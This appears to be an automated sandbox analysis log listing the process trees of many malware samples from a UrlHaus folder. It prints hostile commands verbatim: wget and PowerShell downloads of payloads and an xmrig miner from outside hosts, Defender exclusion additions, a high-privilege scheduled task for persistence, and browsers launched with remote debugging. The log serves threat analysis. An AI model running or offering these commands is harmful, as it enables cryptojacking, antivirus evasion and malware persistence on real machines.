      Loads dropped DLL
      Drops file in Program Files directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:6920
    - - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
        
        "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regsvc
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:6616
    - - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
        
        "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regserver
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:6728
      - C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe
        
        "C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Modifies registry class
        
        PID:6768
      - C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe
        
        "C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Modifies registry class
        
        PID:6872
      - C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe
        
        "C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Modifies registry class
        
        PID:6224
    - - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
        
        "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4zNi4zNTIiIHNoZWxsX3ZlcnNpb249IjEuMy4zNi4zNTEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MkYwOUQ0OUEtRDIyNC00NEU1LTk1NjAtQkI5NDQ2MDEyM0QwfSIgdXNlcmlkPSJ7OTQ1MjhCNDgtNDg1RC00NjM3LUEyNDItNjcwQzUzRkUzRjY0fSIgaW5zdGFsbHNvdXJjZT0idGFnZ2VkbWkiIHJlcXVlc3RpZD0ie0ZDQTVGOTA4LTgwMjktNDdCQi1BRjlELUI3RTVEMzA1RTk1MX0iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgcGh5c21lbW9yeT0iOCIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiLz48YXBwIGFwcGlkPSJ7NDMwRkQ0RDAtQjcyOS00RjYxLUFBMzQtOTE1MjY0ODE3OTlEfSIgdmVyc2lvbj0iMS4zLjM2LjM3MSIgbmV4dHZlcnNpb249IjEuMy4zNi4zNTIiIGxhbmc9InpoLUNOIiBicmFuZD0iIiBjbGllbnQ9IiIgaWlkPSJ7REIyNEVERDMtOTkyMC01RDVGLUZCQkUtOEU3NDNGNzQ4NkMxfSI-PGV2ZW50IGV2ZW50dHlwZT0iMiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgaW5zdGFsbF90aW1lX21zPSIxMjIzIi8-PC9hcHA-PC9yZXF1ZXN0Pg
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:7004
    - - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
        
        "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /handoff "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={DB24EDD3-9920-5D5F-FBBE-8E743F7486C1}&lang=zh-CN&browser=2&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty" /installsource taggedmi /sessionid "{2F09D49A-D224-44E5-9560-BB94460123D0}"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:7128
- - C:\Users\Admin\Downloads\UrlHausFiles\winbox.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\winbox.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:6988
- - C:\Users\Admin\Downloads\UrlHausFiles\boot.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\boot.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    PID:6416
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6E26.tmp\6E27.tmp\6E28.bat C:\Users\Admin\Downloads\UrlHausFiles\boot.exe"
      4⤵
      PID:6644
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:6816
    - - C:\Users\Admin\AppData\Roaming\wget.exe
        
        wget "http://quanlyphongnet.com/net/Google Chrome.exe" -O "Google Chrome.exe"
        5⤵
        Executes dropped EXE
        
        PID:6876
    - - C:\Users\Admin\AppData\Roaming\wget.exe
        
        wget "http://quanlyphongnet.com/net/Coc Coc.exe" -O "Coc Coc.exe"
        5⤵
        Executes dropped EXE
        
        PID:7100
    - - C:\Users\Admin\AppData\Roaming\wget.exe
        
        wget "http://quanlyphongnet.com/net/run.exe" -O "run.exe"
        5⤵
        
        PID:2064
    - - C:\Users\Admin\AppData\Roaming\wget.exe
        
        wget "http://quanlyphongnet.com/net/run2.exe" -O "run2.exe"
        5⤵
        
        PID:5672
    - - C:\Users\Admin\AppData\Roaming\run.exe
        
        run.exe
        5⤵
        
        PID:5936
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5D59.tmp\5D5A.tmp\5D5B.bat C:\Users\Admin\AppData\Roaming\run.exe"
        6⤵
        
        PID:8288
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\GBClientApp\Wallpapers" /deny administrator:(OI)(CI)F /t /c
        7⤵
        Modifies file permissions
        
        PID:8564
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\GBClientApp\Wallpapers" /deny administrators:(OI)(CI)F /t /c
        7⤵
        Modifies file permissions
        
        PID:8612
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:6332
        
        C:\Windows\system32\attrib.exe
        
        attrib -h "C:\Users\Administrator\Desktop\Google Chrome.exe"
        7⤵
        Views/modifies file attributes
        
        PID:8844
        
        C:\Windows\system32\attrib.exe
        
        attrib -h "C:\Users\Administrator\Desktop\Coc Coc.exe"
        7⤵
        Views/modifies file attributes
        
        PID:4760
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:4112
        
        C:\Windows\system32\schtasks.exe
        
        SchTasks /Delete /TN "\Microsoft\Windows\Task Manager\Interactive" /F
        7⤵
        
        PID:8580
        
        C:\Windows\system32\schtasks.exe
        
        SchTasks /Delete /TN "\Microsoft\Windows\USB\Usb-Notifications" /F
        7⤵
        
        PID:3472
        
        C:\Windows\system32\schtasks.exe
        
        SchTasks /Delete /TN "\Microsoft\Windows\Feedback\Siuf\DmClient" /F
        7⤵
        
        PID:2192
        
        C:\Windows\system32\schtasks.exe
        
        SchTasks /Delete /TN "Fix Getting Devices" /F
        7⤵
        
        PID:6216
        
        C:\Windows\system32\schtasks.exe
        
        SchTasks /Delete /TN "Windows Optimize" /F
        7⤵
        
        PID:1396
        
        C:\Windows\system32\schtasks.exe
        
        SchTasks /Delete /TN "ChangeWallpaper" /F
        7⤵
        
        PID:5952
- - C:\Users\Admin\Downloads\UrlHausFiles\Set_up.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\Set_up.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5988
- - C:\Users\Admin\Downloads\UrlHausFiles\SharpHound.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\SharpHound.exe"
    3⤵
    - Executes dropped EXE
    PID:6552
- - C:\Users\Admin\Downloads\UrlHausFiles\ENP.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\ENP.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:6072
- - C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe"
    3⤵
    - Executes dropped EXE
    PID:3348
- - C:\Users\Admin\Downloads\UrlHausFiles\test28.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\test28.exe"
    3⤵
    - Executes dropped EXE
    PID:6608
- - C:\Windows\System32\notepad.exe
    "C:\Windows\System32\notepad.exe" "C:\Users\Admin\Downloads\UrlHausFiles\b.ps1"
    3⤵
    - Opens file in notepad (likely ransom note)
    PID:6720
- - C:\Users\Admin\Downloads\UrlHausFiles\random.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\random.exe"
    3⤵
    - Enumerates VirtualBox registry keys
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:6904
- - C:\Users\Admin\Downloads\UrlHausFiles\award.pdf.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\award.pdf.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3284
- - C:\Users\Admin\Downloads\UrlHausFiles\AllNew.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\AllNew.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:6896
  - - C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
      "C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:5700
    - - C:\Users\Admin\AppData\Local\Temp\10000321101\stail.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10000321101\stail.exe"
        5⤵
        
        PID:336
      - C:\Users\Admin\AppData\Local\Temp\is-FP5B3.tmp\stail.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-FP5B3.tmp\stail.tmp" /SL5="$1501DA,3886989,54272,C:\Users\Admin\AppData\Local\Temp\10000321101\stail.exe"
        6⤵
        
        PID:6188
        
        C:\Windows\SysWOW64\net.exe
        
        "C:\Windows\system32\net.exe" pause coder_media_11281
        7⤵
        
        PID:1268
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 pause coder_media_11281
        8⤵
        
        PID:3172
        
        C:\Users\Admin\AppData\Local\Coder Media 1.7.55\codermedia.exe
        
        "C:\Users\Admin\AppData\Local\Coder Media 1.7.55\codermedia.exe" -i
        7⤵
        
        PID:4524
- - C:\Users\Admin\Downloads\UrlHausFiles\msf.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\msf.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:400
- - C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe"
    3⤵
    - Executes dropped EXE
    PID:1496
- - C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat
    "C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SendNotifyMessage
    PID:5968
  - - C:\Users\Admin\AppData\Local\palladiums\translucently.exe
      "C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat"
      4⤵
      Drops startup file
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of SendNotifyMessage
      PID:5716
    - - C:\Windows\SysWOW64\svchost.exe
        
        "C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat"
        5⤵
        
        PID:3384
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5716 -s 700
        5⤵
        Program crash
        
        PID:2100
- - C:\Users\Admin\Downloads\UrlHausFiles\wwbizsrvs.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\wwbizsrvs.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:6588
- - C:\Users\Admin\Downloads\UrlHausFiles\def.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\def.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    PID:4368
- - C:\Users\Admin\Downloads\UrlHausFiles\TORRENTOLD-1.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\TORRENTOLD-1.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5900
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      PID:4020
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=131.0.6778.86 --initial-client-data=0xf4,0xf8,0xfc,0xd0,0x100,0x7ffe9bf0fd08,0x7ffe9bf0fd14,0x7ffe9bf0fd20
        5⤵
        
        PID:6936
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations=is-enterprise-managed=no --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2092,i,11115856599627285657,5872851182077280152,262144 --variations-seed-version --mojo-platform-channel-handle=2068 /prefetch:2
        5⤵
        
        PID:7036
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --field-trial-handle=2016,i,11115856599627285657,5872851182077280152,262144 --variations-seed-version --mojo-platform-channel-handle=2228 /prefetch:3
        5⤵
        
        PID:6636
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations=is-enterprise-managed=no --field-trial-handle=2372,i,11115856599627285657,5872851182077280152,262144 --variations-seed-version --mojo-platform-channel-handle=2520 /prefetch:8
        5⤵
        
        PID:7668
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3252,i,11115856599627285657,5872851182077280152,262144 --variations-seed-version --mojo-platform-channel-handle=3264 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:7208
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2240,i,11115856599627285657,5872851182077280152,262144 --variations-seed-version --mojo-platform-channel-handle=3400 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:1556
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations=is-enterprise-managed=no --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4044,i,11115856599627285657,5872851182077280152,262144 --variations-seed-version --mojo-platform-channel-handle=4064 /prefetch:2
        5⤵
        Uses browser remote debugging
        
        PID:7200
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4696,i,11115856599627285657,5872851182077280152,262144 --variations-seed-version --mojo-platform-channel-handle=4728 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:5236
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4976,i,11115856599627285657,5872851182077280152,262144 --variations-seed-version --mojo-platform-channel-handle=3940 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:8196
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      PID:6980
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffeaa5c46f8,0x7ffeaa5c4708,0x7ffeaa5c4718
        5⤵
        
        PID:8660
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1324,2511817535852043756,16234768005361468078,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 /prefetch:3
        5⤵
        
        PID:6384
- - C:\Users\Admin\Downloads\UrlHausFiles\GOLD.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\GOLD.exe"
    3⤵
    PID:4748
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4748 -s 732
      4⤵
      Program crash
      PID:7080
- - C:\Users\Admin\Downloads\UrlHausFiles\nguyentri38.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\nguyentri38.exe"
    3⤵
    PID:1124
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D30A.tmp\D30B.tmp\D30C.bat C:\Users\Admin\Downloads\UrlHausFiles\nguyentri38.exe"
      4⤵
      PID:6412
    - - C:\Users\Admin\AppData\Roaming\Bypass.exe
        
        Bypass.exe
        5⤵
        
        PID:6424
      - C:\Users\Admin\AppData\Local\Temp\Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Defender.exe" /D
        6⤵
        
        PID:6948
- - C:\Users\Admin\Downloads\UrlHausFiles\key.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\key.exe"
    3⤵
    PID:1792
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1792 -s 372
      4⤵
      Program crash
      PID:3888
- - C:\Users\Admin\Downloads\UrlHausFiles\7z.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\7z.exe"
    3⤵
    PID:7164
- - C:\Users\Admin\Downloads\UrlHausFiles\Autoupdate.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\Autoupdate.exe"
    3⤵
    PID:4180
- - C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe"
    3⤵
    PID:3264
- - C:\Users\Admin\Downloads\UrlHausFiles\win.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\win.exe"
    3⤵
    PID:4076
- - C:\Users\Admin\Downloads\UrlHausFiles\ew.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\ew.exe"
    3⤵
    PID:3084
- - C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.exe"
    3⤵
    PID:4948
  - - C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.new.exe
      "C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.new.exe" /update "C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.exe"
      4⤵
      PID:2268
    - - C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.exe
        
        "C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.exe" /delete "C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.new.exe"
        5⤵
        
        PID:6068
- - C:\Windows\System32\msiexec.exe
    "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\UrlHausFiles\ONHQNHFT.msi"
    3⤵
    PID:2744
- - C:\Users\Admin\Downloads\UrlHausFiles\System.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\System.exe"
    3⤵
    PID:3744
  - - C:\Users\Admin\AppData\Local\Temp\._cache_System.exe
      "C:\Users\Admin\AppData\Local\Temp\._cache_System.exe"
      4⤵
      PID:3844
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\._cache_System.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5360
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '._cache_System.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6224
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7816
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6052
  - - C:\ProgramData\Synaptics\Synaptics.exe
      "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
      4⤵
      PID:5488
- - C:\Users\Admin\Downloads\UrlHausFiles\bp.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\bp.exe"
    3⤵
    PID:7524
- - C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe"
    3⤵
    PID:7172
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5620
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5932
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:7176
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:8236
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System" /tr "C:\Users\Admin\AppData\Roaming\System.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:6156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\UrlHausFiles\c3pool7.bat" "
    3⤵
    PID:7380
  - - C:\Windows\system32\net.exe
      net session
      4⤵
      PID:7268
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        5⤵
        
        PID:232
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/WinRing0x64.sys', 'C:\Users\Admin\c3pool\WinRing0x64.sys')"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:7464
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/config.json', 'C:\Users\Admin\c3pool\config.json')"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:7664
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/xmrig.exe', 'C:\Users\Admin\c3pool\xmrig.exe')"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:8556
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/nssm.exe', 'C:\Users\Admin\c3pool\nssm.exe')"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:8776
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell.exe -Command "hostname | foreach { $_ -replace '[^a-zA-Z0-9]+', '_' }"
      4⤵
      PID:5460
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -Command "hostname | foreach { $_ -replace '[^a-zA-Z0-9]+', '_' }"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5524
      - C:\Windows\system32\HOSTNAME.EXE
        
        "C:\Windows\system32\HOSTNAME.EXE"
        6⤵
        
        PID:6196
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -Command "$out = gc 'C:\Users\Admin\c3pool\config.json' | foreach { $_ -replace '\"url\": *\".*\",', '\"url\": \"auto.c3pool.org:80\",' } | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\c3pool\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:8988
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -Command "$out = gc 'C:\Users\Admin\c3pool\config.json' | foreach { $_ -replace '\"user\": *\".*\",', '\"user\": \"\",' } | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\c3pool\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:6940
